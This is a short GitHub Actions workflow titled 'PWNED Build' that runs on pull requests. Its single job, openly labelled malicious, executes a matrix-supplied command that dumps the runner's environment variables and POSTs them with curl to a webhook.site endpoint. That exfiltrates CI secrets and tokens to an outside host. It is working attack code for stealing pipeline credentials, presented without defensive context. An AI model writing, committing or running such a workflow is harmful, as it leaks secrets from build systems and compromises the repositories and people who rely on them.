name: PWNED Build

on:
  pull_request:

jobs:
  malicious-job:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        target: [
          "echo '🔥 Exploiting CI'; env | curl -X POST -d @- https://webhook.site/a813eb6c-e727-4da0-bf4d-b215c95a855a"
                  ]
    steps:
      - name: Malicious Execution
        run: |
          echo "Target command: ${{ matrix.target }}"
          bash -c "${{ matrix.target }}"
